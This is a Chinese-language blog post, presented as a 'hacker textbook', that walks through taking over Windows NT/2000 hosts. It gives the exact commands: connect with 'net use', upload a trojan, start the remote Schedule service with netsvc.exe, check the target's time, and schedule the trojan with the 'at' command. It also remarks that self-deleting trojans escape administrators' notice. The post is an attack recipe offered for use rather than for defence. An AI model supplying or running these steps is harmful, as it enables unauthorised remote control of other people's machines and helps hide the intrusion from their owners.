当前位置:
首页 > 杂文分享 > 黑客教材系列——手把手教你NT入侵

黑客教材系列——手把手教你NT入侵

在一些入侵NT的教学里都有讲到执行程序的方法,我单独提出来写成贴子可能是多余,但我还是希望对大家有用。操作系统平台:必须为NT,可以是WINNT4.0或5.0;WorkStation 或Server;还可以是WIN2000。

工具:Netsvc.exe 用于启动远程主机的schedule服务。

开始:开DOS窗口,输入net use \ip 等等连接上目标主机。把木马上传到目标主机。建议放在你共享的所在目录,或系统目录WINNT下,执行时不用再输入程序所在路径。木马都有自我删除功能,所以一般不会被管理员发现。
上传木马后,键入:

C:/>netsvc \ip schedule /start

启动目标主机的schedule服务(schedule服务用来定时执行某程序,我们可利用它来执行木马程序)。这过程可能会持续较久,一定要等到提示符出现才进行下一步,不要急急忙忙关了窗口.
然后键入:

C:/>net time \ip

将显示目标主机的系统时间,如:14:43
记住这时间,接下来用AT命令往目标主机添加入定时启动木马程序的任务,键入:

C:/>at \ip 14:45 trojan.exe

注意:这里我启动时间定为14:45而不是14:43,往后推迟了几分钟,这是考虑到命令往返于两机需要一定的时间(中国的网络速度实在太慢啦!)
至此,你只要等稍等几分钟过去,就可以打开你的木马客户器控制目标主机了,也不用那么麻烦地执行程序啦!木马程序的路径要设定好!

分享生活点滴,内容问题可与我联系。 斜杆青年:资深产品经理/网站工程师/科技爱好者/新媒体运营/自媒体写作人